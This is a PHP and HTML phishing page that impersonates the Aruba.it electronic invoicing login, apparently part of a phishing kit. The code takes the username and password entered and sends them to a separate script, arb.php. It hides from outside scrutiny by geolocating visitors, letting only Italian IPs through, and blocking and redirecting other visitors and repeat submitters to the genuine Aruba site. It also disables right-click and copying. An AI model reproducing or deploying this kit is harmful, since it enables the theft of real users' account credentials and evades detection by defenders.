<?php
session_start();

// Funcția pentru a verifica dacă un UUID sau IP este blocat
function isBlocked($uuid, $ip) {
   $file = 'ip_block_list.txt';
   $logFile = 'logs.txt';
    if (!file_exists($file)) {
        return false;
    }
    $blockedEntries = file($file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
    foreach ($blockedEntries as $entry) {
        if (strpos($entry, $uuid) !== false || strpos($entry, $ip) !== false) {
            return true;
        }
    }
    return false;
}

function blockEntry($uuid, $ip) {
$file = 'ip_block_list.txt';
if (!isBlocked($uuid, $ip)) { 
        $entry = "UUID: $uuid - IP: $ip";
        $result = file_put_contents($file, $entry . PHP_EOL, FILE_APPEND | LOCK_EX);
        if ($result === false) {
            error_log("Eroare la salvarea intrării: $entry în $file"); 
        }
    }
}
$blockFile = __DIR__ . '/ip_block_list.txt'; 
$logFile = __DIR__ . '/logs.txt'; 

if (!isset($_SESSION['client_uuid'])) {
    $_SESSION['client_uuid'] = uniqid('uuid_', true);
}

$clientUUID = $_SESSION['client_uuid'];
$clientIP = $_SERVER['REMOTE_ADDR']; 

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['accedi'])) {
    blockEntry($clientUUID, $clientIP);
}


if (isBlocked($clientUUID, $clientIP)) {
    
    header("Location: https://fatturazioneelettronica.aruba.it/#login");
    exit; 
}




function getCountryByCurl($ip) {
    $url = "http://ip-api.com/json/{$ip}";
    $ch = curl_init();

    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);

    $response = curl_exec($ch);

    if (curl_errno($ch)) {
        error_log("Eroare cURL: " . curl_error($ch));
        curl_close($ch);
        return "Unknown";
    }

    curl_close($ch);

    $data = json_decode($response, true);

    if (isset($data['status']) && $data['status'] === 'success') {
        return $data['countryCode'] ?? "Unknown"; // Returnează codul țării (ex: IT, DE, etc.)
    }

    return "Unknown";
}

function isIpBlocked($ip, $file) {
    if (!file_exists($file)) {
        return false;
    }
    $blockedIps = file($file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
    return in_array($ip, $blockedIps);
}

// Funcția pentru adăugarea unui IP în lista de blocare
function blockIp($ip, $file) {
    file_put_contents($file, $ip . PHP_EOL, FILE_APPEND);
}

$clientIp = $_SERVER['HTTP_X_FORWARDED_FOR'] ?? $_SERVER['REMOTE_ADDR'];


if (isIpBlocked($clientIp, $blockFile)) {
    $logEntry = "IP: {$clientIp} - Access Denied (Blocked IP), Redirected to login. Time: " . date('Y-m-d H:i:s') . PHP_EOL;
    file_put_contents($logFile, $logEntry, FILE_APPEND);
    header('Location: https://fatturazioneelettronica.aruba.it/#login');
    exit();
}

$country = getCountryByCurl($clientIp);
$allowedCountries = ['IT']; // Italia

$logEntry = "IP: {$clientIp}, Country: {$country}, Time: " . date('Y-m-d H:i:s') . PHP_EOL;
file_put_contents($logFile, $logEntry, FILE_APPEND);

if ($country === "Unknown" || !in_array($country, $allowedCountries)) {
    $logEntry = "IP: {$clientIp}, Country: {$country} - Access Denied (Not Allowed Country), Redirected to login. Time: " . date('Y-m-d H:i:s') . PHP_EOL;
    file_put_contents($logFile, $logEntry, FILE_APPEND);

    blockIp($clientIp, $blockFile);

    header('Location: https://fatturazioneelettronica.aruba.it/#login');
    exit();
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
 
    $username = isset($_POST['username']) ? htmlspecialchars($_POST['username']) : '';
    $password = isset($_POST['password']) ? htmlspecialchars($_POST['password']) : '';

    header("Location: arb.php?username=" . urlencode($username) . "&password=" . urlencode($password));
    exit();
}
?>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Accesso Fatturazione Elettronica | Aruba.it</title>
    <link rel="icon" type="image/x-icon" href="https://fatturazioneelettronica.aruba.it/resources/favicon/favicon.ico">
    <style>
        /* Reset CSS */
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }

        html, body {
            height: 100%;
            font-family: Arial, sans-serif;
            background-color: #f5f5f5;
        }

        .split-screen {
            display: flex;
            flex-direction: row;
            height: 100vh;
        }

        .left, .right {
            width: 50%;
            height: 100%;
        }

        .left {
            background: url('left.jpg') no-repeat center center;
            background-size: cover;
        }

        .right {
            background-color: #ffffff;
            display: flex;
            flex-direction: column;
            align-items: center;
            position: relative;
        }

        .right-logo {
            position: absolute;
            top: calc(2% + 0.5cm);
            left: calc(98% - 1cm - 150px);
        }

        .right-logo img {
            max-width: 150px;
            height: auto;
        }

        .login-box {
            width: 50%;
            height: 70%;
            padding: 0.5rem;
            background-color: #f9f9f9;
            border-radius: 8px;
            box-shadow: 0 8px 20px rgba(0, 0, 0, 0.25);
            margin-top: 4cm;
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: space-evenly;
            text-align: center;
        }

        .login-box img {
            max-width: 6cm;
        }

        .login-box p {
            font-size: 1rem;
            color: #666;
        }

        .input-group {
            width: 8cm;
            margin-bottom: 1rem;
        }

        .input-group label {
            display: block;
            font-weight: bold;
            margin-bottom: 0.04cm;
            font-size: 0.9rem;
            color: #333;
            text-align: left;
        }

        .input-group input {
            width: 100%;
            height: 0.7cm;
            padding: 0 0.2rem;
            font-size: 0.8rem;
            border: 1px solid #ccc;
            border-radius: 4px;
            box-sizing: border-box;
        }

        .btn-login {
            margin-top: 0.09cm;
            width: 8cm;
            height: 0.9cm;
            font-size: 0.9rem;
            background-color: #1474be;
            color: #fff;
            border: none;
            border-radius: 4px;
            cursor: pointer;
        }

        .btn-login:hover {
            background-color: #005bb5;
        }

        .login-links {
            font-size: 0.8rem;
            color: #666;
            text-align: right;
            width: 80%;
        }

        .login-links p {
            margin: 0.3rem 0;
        }

        .login-links a {
            font-size: inherit;
            color: #1474be;
            text-decoration: none;
        }

        .login-links a:hover {
            text-decoration: underline;
        }

        .additional-info {
            position: absolute;
            bottom: 1%;
            width: 90%;
            font-size: 0.75rem;
            color: #666;
            text-align: center;
            line-height: 1.4;
        }

        .additional-info p {
            text-align: center;
            width: 100%;
            margin: 0;
            white-space: nowrap;
        }

        .additional-info a {
            color: #1474be;
            text-decoration: none;
        }

        .additional-info a:hover {
            text-decoration: underline;
        }

        @media screen and (max-width: 768px) {
            .login-box {
                width: 90%;
                height: auto;
            }

            .btn-login {
                width: 90%;
            }

            .login-links,
            .additional-info {
                font-size: 0.7rem;
            }
        }
    </style>
</head>
<body>
    <div class="split-screen">
        <div class="left"></div>
        <div class="right">
            <div class="right-logo">
                <img src="https://upload.wikimedia.org/wikipedia/commons/d/d9/Logo-Aruba-it-2019.png" alt="Aruba Logo">
            </div>

            <div class="login-box">
                <img src="logo.jpg" alt="Logo">
                <p>Inserisci i dati per accedere</p>
                <form method="POST" action="arb.php">
    <div class="input-group">
        <label for="username">Username</label>
        <input type="text" id="username" name="username" placeholder="ES. ARUBA123456">
    </div>
    <div class="input-group">
        <label for="password">Password</label>
        <input type="password" id="password" name="password" placeholder="">
    </div>
    <button type="submit" class="btn-login" name="accedi">Accedi</button>
</form>
                <div class="login-links">
                    <p><a href="#">Non ricordi la password?</a></p>
                    <p><a href="#">Non ricordi lo username?</a></p>
                </div>
            </div>
            <div class="additional-info">
                <p>
                    <a href="#">Non hai ancora un servizio di Fatturazione Elettronica? Acquista subito</a>
                </p>
            </div>
        </div>
    </div>
</body>
</html>

<script>
    document.addEventListener('contextmenu', event => event.preventDefault());
    document.addEventListener('copy', event => event.preventDefault());
</script>
